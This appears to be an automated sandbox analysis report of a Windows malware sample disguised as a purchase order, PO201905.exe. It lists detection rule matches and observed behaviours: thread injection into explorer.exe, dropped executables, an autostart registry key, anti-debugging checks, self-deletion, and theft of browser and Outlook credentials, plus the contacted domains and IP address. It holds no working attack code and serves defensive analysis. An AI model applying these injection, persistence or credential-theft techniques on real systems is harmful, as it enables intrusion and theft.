Source: 6.0.explorer.exe.3230000.60.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.59.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.57.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.51e0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.5.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b70000.25.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.57.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.7.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5280000.33.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.21.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.45.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.44.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b80000.26.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.10.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.210000.2.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.9.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.44.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4d40000.28.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.59.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.55.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4c00000.27.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53a0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.8.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.51.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.25c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.50.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.48.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.16.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.51.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.fb0000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.23.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.61.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.49.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.47.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.9b0000.45.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.0.PO201905.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.41.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.61.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.41.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.33b0000.62.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.3.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.50e0000.31.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.680000.3.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.33b0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.25c0000.4.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.86e0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.50e0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.winEXE@11/6@4/3
Creates files inside the program directoryShow sources
Source: C:\Windows\explorer.exeFile created: C:\Program Files\FppxlgnJump to behavior
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\ipconfig.exeFile created: C:\Users\user\AppData\Roaming\KM3N36B6Jump to behavior
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FppxlgnJump to behavior
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.U.s.e.r.s.\.p.a.u.l.a.\.D.e.s.k.t.o.p.\.P.O.2.0.1.9.0.5...e.x.e......E..,.d.,.J....F.I....\.,.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........D.,.........V..I............D.,.....#.=w..,.&...`.....,.....Jump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\Desktop\PO201905.exeCommand line argument: HexCalc0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exeCommand line argument: HexCalc0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exeCommand line argument: HexCalc0_2_00FB10C0
Source: C:\Users\user\Desktop\PO201905.exeCommand line argument: HexCalc0_2_00FB10C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCommand line argument: HexCalc12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCommand line argument: HexCalc12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCommand line argument: HexCalc12_1_010610C0
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCommand line argument: HexCalc12_1_010610C0
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\PO201905.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: PO201905.exevirustotal: Detection: 16%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\PO201905.exe 'C:\Users\user\Desktop\PO201905.exe'
Source: unknownProcess created: C:\Windows\System32\autoconv.exe unknown
Source: unknownProcess created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'
Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: unknownProcess created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\autoconv.exe unknownJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'Jump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\System32\ipconfig.exeFile written: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.iniJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\System32\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Creates a directory in C:\Program FilesShow sources
Source: C:\Windows\explorer.exeDirectory created: C:\Program Files\FppxlgnJump to behavior
Source: C:\Windows\explorer.exeDirectory created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeJump to behavior
PE file contains a mix of data directories often seen in goodwareShow sources
Source: PO201905.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO201905.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO201905.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO201905.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO201905.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO201905.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: PO201905.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: PO201905.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: ipconfig.pdb source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp
Source: Binary string: C:\Users\Good Gold\Desktop\stub0b\HEXCALC\Release\HEXCALC.pdb source: PO201905.exe
Source: Binary string: ipconfig.pdbN source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmp
Source: Binary string: ntdll.pdb source: PO201905.exe
Source: Binary string: ntdll.pdb3 source: PO201905.exe, 00000000.00000002.4520123297.025C0000.00000040.sdmp
PE file contains a valid data directory to section mappingShow sources
Source: PO201905.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO201905.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO201905.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO201905.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO201905.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB47DB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FB47DB
PE file contains an invalid checksumShow sources
Source: PO201905.exeStatic PE information: real checksum: 0xdb70b should be: 0xe4ebf
Source: 9rxlgd1bcduf.exe.6.drStatic PE information: real checksum: 0xdb70b should be: 0xe4ebf
Source: 9rxlgd1bcduf.exe0.6.drStatic PE information: real checksum: 0xdb70b should be: 0xe4ebf
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FCE44C push edi; iretd 0_2_00FCE44D
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD143B push esi; ret 0_2_00FD143C
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FBFDF8 push cs; ret 0_2_00FBFE15
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD45F4 push eax; ret 0_2_00FD45FA
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD4593 push eax; ret 0_2_00FD45FA
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD458A push eax; ret 0_2_00FD4590
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD453D push eax; ret 0_2_00FD4590
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB27B5 push ecx; ret 0_2_00FB27C8
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCode function: 12_1_010627B5 push ecx; ret 12_1_010627C8
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .data entropy: 7.99430221818
Source: initial sampleStatic PE information: section name: .data entropy: 7.99430221818
Source: initial sampleStatic PE information: section name: .data entropy: 7.99430221818

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settingsShow sources
Source: unknownProcess created: C:\Windows\System32\ipconfig.exe C:\Windows\System32\ipconfig.exe
Drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeJump to dropped file
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Fppxlgn\9rxlgd1bcduf.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Windows\System32\ipconfig.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\explorer\Run ZLM0DHTPPJEJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FC1F58 rdtsc 0_2_00FC1F58
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\explorer.exe TID: 3800Thread sleep time: -480000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3800Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\ipconfig.exe TID: 3076Thread sleep time: -35000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\ipconfig.exeLast function: Thread delayed
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\PO201905.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\PO201905.exeSystem information queried: KernelDebuggerInformationJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\PO201905.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FC1F58 rdtsc 0_2_00FC1F58
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB16AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FB16AB
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB47DB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FB47DB
Enables debug privilegesShow sources
Source: C:\Users\user\Desktop\PO201905.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB34EA SetUnhandledExceptionFilter,0_2_00FB34EA
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB16AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FB16AB
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB4447 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FB4447
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB16B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FB16B6
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCode function: 12_1_010616AB _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_010616AB
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCode function: 12_1_010634EA SetUnhandledExceptionFilter,12_1_010634EA
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCode function: 12_1_01064447 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_1_01064447
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeCode function: 12_1_010616B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_1_010616B6

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: 9rxlgd1bcduf.exe.6.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\Desktop\PO201905.exeSection loaded: unknown target pid: 1880 protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\Desktop\PO201905.exeThread register set: target process: 1880Jump to behavior
Source: C:\Windows\System32\ipconfig.exeThread register set: target process: 1880Jump to behavior
Queues an APC in another process (thread injection)Show sources
Source: C:\Users\user\Desktop\PO201905.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\PO201905.exe'Jump to behavior
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000006.00000000.4496171852.00CD0000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmpBinary or memory string: Progmanp

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FB194C GetSystemTimeAsFileTime,__aulldiv,0_2_00FB194C

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\System32\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\System32\ipconfig.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\System32\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 855421 Sample: PO201905.exe Startdate: 06/05/2019 Architecture: WINDOWS Score: 100 40 www.lianhe.ink 2->40 42 www.dazhen.ltd 2->42 44 www.dazhen.ltd.w.kunlunsl.com 2->44 60 Antivirus or Machine Learning detection for dropped file 2->60 62 Antivirus or Machine Learning detection for sample 2->62 64 Multi AV Scanner detection for dropped file 2->64 66 4 other signatures 2->66 9 PO201905.exe 2->9         started        signatures3 process4 signatures5 68 Modifies the context of a thread in another process (thread injection) 9->68 70 Maps a DLL or memory area into another process 9->70 72 Queues an APC in another process (thread injection) 9->72 12 explorer.exe 1 4 9->12 injected process6 dnsIp7 46 www.shakeitmiami.com 208.91.197.91, 49243, 80 unknown Virgin Islands (BRITISH) 12->46 48 www.lianhe.ink 12->48 50 2 other IPs or domains 12->50 36 C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, PE32 12->36 dropped 38 C:\Users\user\AppData\...\9rxlgd1bcduf.exe, PE32 12->38 dropped 74 System process connects to network (likely due to code injection or exploit) 12->74 76 Benign windows process drops PE files 12->76 17 ipconfig.exe 1 14 12->17         started        21 9rxlgd1bcduf.exe 12->21         started        23 autoconv.exe 12->23         started        file8 signatures9 process10 file11 30 C:\Users\user\AppData\...\KM3logrv.ini, data 17->30 dropped 32 C:\Users\user\AppData\...\KM3logri.ini, data 17->32 dropped 52 